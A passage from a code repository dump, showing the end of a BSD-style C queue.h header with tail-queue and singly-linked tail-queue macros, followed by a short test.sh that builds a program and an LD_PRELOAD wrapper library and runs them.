TAILQ_FOREACH(var, head, field) \ 444 | for ((var) = ((head)->tqh_first); \ 445 | (var) != TAILQ_END(head); \ 446 | (var) = ((var)->field.tqe_next)) 447 | 448 | #define TAILQ_FOREACH_SAFE(var, head, field, next) \ 449 | for ((var) = ((head)->tqh_first); \ 450 | (var) != TAILQ_END(head) && \ 451 | ((next) = TAILQ_NEXT(var, field), 1); (var) = (next)) 452 | 453 | #define TAILQ_FOREACH_REVERSE(var, head, headname, field) \ 454 | for ((var) = (*(((struct headname *)((head)->tqh_last))->tqh_last));\ 455 | (var) != TAILQ_END(head); \ 456 | (var) = (*(((struct headname *)((var)->field.tqe_prev))->tqh_last))) 457 | 458 | #define TAILQ_FOREACH_REVERSE_SAFE(var, head, headname, field, prev) \ 459 | for ((var) = TAILQ_LAST((head), headname); \ 460 | (var) != TAILQ_END(head) && \ 461 | ((prev) = TAILQ_PREV((var), headname, field), 1); (var) = (prev)) 462 | 463 | /* 464 | * Tail queue functions. 465 | */ 466 | #if defined(QUEUEDEBUG) 467 | #define QUEUEDEBUG_TAILQ_INSERT_HEAD(head, elm, field) \ 468 | if ((head)->tqh_first && \ 469 | (head)->tqh_first->field.tqe_prev != &(head)->tqh_first) \ 470 | QUEUEDEBUG_ABORT("TAILQ_INSERT_HEAD %p %s:%d", (head), \ 471 | __FILE__, __LINE__); 472 | #define QUEUEDEBUG_TAILQ_INSERT_TAIL(head, elm, field) \ 473 | if (*(head)->tqh_last != NULL) \ 474 | QUEUEDEBUG_ABORT("TAILQ_INSERT_TAIL %p %s:%d", (head), \ 475 | __FILE__, __LINE__); 476 | #define QUEUEDEBUG_TAILQ_OP(elm, field) \ 477 | if ((elm)->field.tqe_next && \ 478 | (elm)->field.tqe_next->field.tqe_prev != \ 479 | &(elm)->field.tqe_next) \ 480 | QUEUEDEBUG_ABORT("TAILQ_* forw %p %s:%d", (elm), \ 481 | __FILE__, __LINE__); \ 482 | if (*(elm)->field.tqe_prev != (elm)) \ 483 | QUEUEDEBUG_ABORT("TAILQ_* back %p %s:%d", (elm), \ 484 | __FILE__, __LINE__); 485 | #define QUEUEDEBUG_TAILQ_PREREMOVE(head, elm, field) \ 486 | if ((elm)->field.tqe_next == NULL && \ 487 | (head)->tqh_last != &(elm)->field.tqe_next) \ 488 | QUEUEDEBUG_ABORT("TAILQ_PREREMOVE head %p elm %p %s:%d",\ 489 | (head), (elm), __FILE__, __LINE__); 490 | #define QUEUEDEBUG_TAILQ_POSTREMOVE(elm, field) \ 491 | (elm)->field.tqe_next = (void *)1L; \ 492 | (elm)->field.tqe_prev = (void *)1L; 493 | #else 494 | #define QUEUEDEBUG_TAILQ_INSERT_HEAD(head, elm, field) 495 | #define QUEUEDEBUG_TAILQ_INSERT_TAIL(head, elm, field) 496 | #define QUEUEDEBUG_TAILQ_OP(elm, field) 497 | #define QUEUEDEBUG_TAILQ_PREREMOVE(head, elm, field) 498 | #define QUEUEDEBUG_TAILQ_POSTREMOVE(elm, field) 499 | #endif 500 | 501 | #define TAILQ_INIT(head) do { \ 502 | (head)->tqh_first = TAILQ_END(head); \ 503 | (head)->tqh_last = &(head)->tqh_first; \ 504 | } while (/*CONSTCOND*/0) 505 | 506 | #define TAILQ_INSERT_HEAD(head, elm, field) do { \ 507 | QUEUEDEBUG_TAILQ_INSERT_HEAD((head), (elm), field) \ 508 | if (((elm)->field.tqe_next = (head)->tqh_first) != TAILQ_END(head))\ 509 | (head)->tqh_first->field.tqe_prev = \ 510 | &(elm)->field.tqe_next; \ 511 | else \ 512 | (head)->tqh_last = &(elm)->field.tqe_next; \ 513 | (head)->tqh_first = (elm); \ 514 | (elm)->field.tqe_prev = &(head)->tqh_first; \ 515 | } while (/*CONSTCOND*/0) 516 | 517 | #define TAILQ_INSERT_TAIL(head, elm, field) do { \ 518 | QUEUEDEBUG_TAILQ_INSERT_TAIL((head), (elm), field) \ 519 | (elm)->field.tqe_next = TAILQ_END(head); \ 520 | (elm)->field.tqe_prev = (head)->tqh_last; \ 521 | *(head)->tqh_last = (elm); \ 522 | (head)->tqh_last = &(elm)->field.tqe_next; \ 523 | } while (/*CONSTCOND*/0) 524 | 525 | #define TAILQ_INSERT_AFTER(head, listelm, elm, field) do { \ 526 | QUEUEDEBUG_TAILQ_OP((listelm), field) \ 527 | if (((elm)->field.tqe_next = (listelm)->field.tqe_next) != \ 528 | TAILQ_END(head)) \ 529 | (elm)->field.tqe_next->field.tqe_prev = \ 530 | &(elm)->field.tqe_next; \ 531 | else \ 532 | (head)->tqh_last = &(elm)->field.tqe_next; \ 533 | (listelm)->field.tqe_next = (elm); \ 534 | (elm)->field.tqe_prev = &(listelm)->field.tqe_next; \ 535 | } while (/*CONSTCOND*/0) 536 | 537 | #define TAILQ_INSERT_BEFORE(listelm, elm, field) do { \ 538 | QUEUEDEBUG_TAILQ_OP((listelm), field) \ 539 | (elm)->field.tqe_prev = (listelm)->field.tqe_prev; \ 540 | (elm)->field.tqe_next = (listelm); \ 541 | *(listelm)->field.tqe_prev = (elm); \ 542 | (listelm)->field.tqe_prev = &(elm)->field.tqe_next; \ 543 | } while (/*CONSTCOND*/0) 544 | 545 | #define TAILQ_REMOVE(head, elm, field) do { \ 546 | QUEUEDEBUG_TAILQ_PREREMOVE((head), (elm), field) \ 547 | QUEUEDEBUG_TAILQ_OP((elm), field) \ 548 | if (((elm)->field.tqe_next) != TAILQ_END(head)) \ 549 | (elm)->field.tqe_next->field.tqe_prev = \ 550 | (elm)->field.tqe_prev; \ 551 | else \ 552 | (head)->tqh_last = (elm)->field.tqe_prev; \ 553 | *(elm)->field.tqe_prev = (elm)->field.tqe_next; \ 554 | QUEUEDEBUG_TAILQ_POSTREMOVE((elm), field); \ 555 | } while (/*CONSTCOND*/0) 556 | 557 | #define TAILQ_REPLACE(head, elm, elm2, field) do { \ 558 | if (((elm2)->field.tqe_next = (elm)->field.tqe_next) != \ 559 | TAILQ_END(head)) \ 560 | (elm2)->field.tqe_next->field.tqe_prev = \ 561 | &(elm2)->field.tqe_next; \ 562 | else \ 563 | (head)->tqh_last = &(elm2)->field.tqe_next; \ 564 | (elm2)->field.tqe_prev = (elm)->field.tqe_prev; \ 565 | *(elm2)->field.tqe_prev = (elm2); \ 566 | QUEUEDEBUG_TAILQ_POSTREMOVE((elm), field); \ 567 | } while (/*CONSTCOND*/0) 568 | 569 | #define TAILQ_CONCAT(head1, head2, field) do { \ 570 | if (!TAILQ_EMPTY(head2)) { \ 571 | *(head1)->tqh_last = (head2)->tqh_first; \ 572 | (head2)->tqh_first->field.tqe_prev = (head1)->tqh_last; \ 573 | (head1)->tqh_last = (head2)->tqh_last; \ 574 | TAILQ_INIT((head2)); \ 575 | } \ 576 | } while (/*CONSTCOND*/0) 577 | 578 | /* 579 | * Singly-linked Tail queue declarations. 580 | */ 581 | #define STAILQ_HEAD(name, type) \ 582 | struct name { \ 583 | struct type *stqh_first; /* first element */ \ 584 | struct type **stqh_last; /* addr of last next element */ \ 585 | } 586 | 587 | #define STAILQ_HEAD_INITIALIZER(head) \ 588 | { NULL, &(head).stqh_first } 589 | 590 | #define STAILQ_ENTRY(type) \ 591 | struct { \ 592 | struct type *stqe_next; /* next element */ \ 593 | } 594 | 595 | /* 596 | * Singly-linked Tail queue access methods. 597 | */ 598 | #define STAILQ_FIRST(head) ((head)->stqh_first) 599 | #define STAILQ_END(head) NULL 600 | #define STAILQ_NEXT(elm, field) ((elm)->field.stqe_next) 601 | #define STAILQ_EMPTY(head) (STAILQ_FIRST(head) == STAILQ_END(head)) 602 | 603 | /* 604 | * Singly-linked Tail queue functions. 605 | */ 606 | #define STAILQ_INIT(head) do { \ 607 | (head)->stqh_first = NULL; \ 608 | (head)->stqh_last = &(head)->stqh_first; \ 609 | } while (/*CONSTCOND*/0) 610 | 611 | #define STAILQ_INSERT_HEAD(head, elm, field) do { \ 612 | if (((elm)->field.stqe_next = (head)->stqh_first) == NULL) \ 613 | (head)->stqh_last = &(elm)->field.stqe_next; \ 614 | (head)->stqh_first = (elm); \ 615 | } while (/*CONSTCOND*/0) 616 | 617 | #define STAILQ_INSERT_TAIL(head, elm, field) do { \ 618 | (elm)->field.stqe_next = NULL; \ 619 | *(head)->stqh_last = (elm); \ 620 | (head)->stqh_last = &(elm)->field.stqe_next; \ 621 | } while (/*CONSTCOND*/0) 622 | 623 | #define STAILQ_INSERT_AFTER(head, listelm, elm, field) do { \ 624 | if (((elm)->field.stqe_next = (listelm)->field.stqe_next) == NULL)\ 625 | (head)->stqh_last = &(elm)->field.stqe_next; \ 626 | (listelm)->field.stqe_next = (elm); \ 627 | } while (/*CONSTCOND*/0) 628 | 629 | #define STAILQ_REMOVE_HEAD(head, field) do { \ 630 | if (((head)->stqh_first = (head)->stqh_first->field.stqe_next) == NULL) \ 631 | (head)->stqh_last = &(head)->stqh_first; \ 632 | } while (/*CONSTCOND*/0) 633 | 634 | #define STAILQ_REMOVE(head, elm, type, field) do { \ 635 | if ((head)->stqh_first == (elm)) { \ 636 | STAILQ_REMOVE_HEAD((head), field); \ 637 | } else { \ 638 | struct type *curelm = (head)->stqh_first; \ 639 | while (curelm->field.stqe_next != (elm)) \ 640 | curelm = curelm->field.stqe_next; \ 641 | if ((curelm->field.stqe_next = \ 642 | curelm->field.stqe_next->field.stqe_next) == NULL) \ 643 | (head)->stqh_last = &(curelm)->field.stqe_next; \ 644 | } \ 645 | } while (/*CONSTCOND*/0) 646 | 647 | #define STAILQ_FOREACH(var, head, field) \ 648 | for ((var) = ((head)->stqh_first); \ 649 | (var); \ 650 | (var) = ((var)->field.stqe_next)) 651 | 652 | #define STAILQ_FOREACH_SAFE(var, head, field, tvar) \ 653 | for ((var) = STAILQ_FIRST((head)); \ 654 | (var) && ((tvar) = STAILQ_NEXT((var), field), 1); \ 655 | (var) = (tvar)) 656 | 657 | #define STAILQ_CONCAT(head1, head2) do { \ 658 | if (!STAILQ_EMPTY((head2))) { \ 659 | *(head1)->stqh_last = (head2)->stqh_first; \ 660 | (head1)->stqh_last = (head2)->stqh_last; \ 661 | STAILQ_INIT((head2)); \ 662 | } \ 663 | } while (/*CONSTCOND*/0) 664 | 665 | #define STAILQ_LAST(head, type, field) \ 666 | (STAILQ_EMPTY((head)) ? \ 667 | NULL : \ 668 | ((struct type *)(void *) \ 669 | ((char *)((head)->stqh_last) - offsetof(struct type, field)))) 670 | 671 | #endif /* !_BMK_CORE_QUEUE_H_ */ 672 | -------------------------------------------------------------------------------- /test.sh: -------------------------------------------------------------------------------- 1 | gcc hello.c -o hello 2 | gcc -fPIC -shared -pthread -O2 -o wrap.so dz.c gc.c -ldl 3 | /bin/cp hello /trusted/consume 4 | /bin/cp wrap.so /trusted/wrap.so 5 | LD_PRELOAD=/trusted/wrap.so /trusted/consume 6 | --------------------------------------------------------------------------------